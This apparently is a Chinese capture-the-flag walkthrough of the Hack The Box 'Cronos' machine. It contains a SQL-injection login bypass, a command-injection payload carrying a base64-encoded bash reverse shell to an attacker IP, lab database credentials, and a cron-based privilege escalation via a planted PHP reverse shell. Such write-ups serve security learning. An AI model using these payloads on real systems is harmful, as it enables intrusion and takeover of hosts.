nmap扫描,开启22、80、53
,其中80对应apache默认web服务
尝试对DNS服务进行攻击
dig查询,没有信息。dig axfr
可以用于检测区域传送漏洞。
使用nslookup查询,得到一个域名ns1.cronos.htb
基于获取到的域名,再次进行dig查询,得到域名admin.cronos.htb
修改本地hosts文件,访问http://admin.cronos.htb
,得到一个web页面
通过万能密码成功登录到后台;UserName:admin' or 1=1#
后台看起来很象命令执行的利用,尝试之后确实如此。payload:8.8.8.8;ls
直接反弹shell;payload:8.8.8.8;echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zLzEyMzQgMD4mMSc=|base64 -d|bash -i
信息收集,看到普通用户noulis
在web服务的路径下发现config.php
,得到数据库连接方式admin/kEjdbRigfBHUREiNSDs
;尝试使用该密码直接登录noulis的ssh,但是失败。
既然给了数据库密码,那么就看一下数据库,果然存在,但是仅对127.0.0.1开启监听。
为了方便,直接查询;得到密码4f5fffa7b2340178a716e3832451e058
,看起来是MD5值。
mysql -uadmin -pkEjdbRigfBHUREiNSDs -e "show databases;"
mysql -uadmin -pkEjdbRigfBHUREiNSDs -e "use admin;show tables;"
mysql -uadmin -pkEjdbRigfBHUREiNSDs -e "use admin;show tables;select * from admin.users;"
MD5解密,得到明文:1327663704
;但是这个密码也无法登录noulis用户。
只好上传linenum进行信息收集,只发现noulis有特殊权限。
继续收集信息,找到另一个web目录laravel
在apache2的配置文件中找到另一个域名www.cronos.htb
访问后得到如下页面,但是分析之后,laravel同样也是运行在www-data权限下的,所以就算RCE也同样拿到的www-data权限。
回过头看,发现定时任务中存在特殊内容,且以root权限运行。涉及到文件/var/www/laravel/artisan
该文件是www-data可以控制的,所以可以直接替换文件为php反弹shell脚本,等待定时任务触发执行。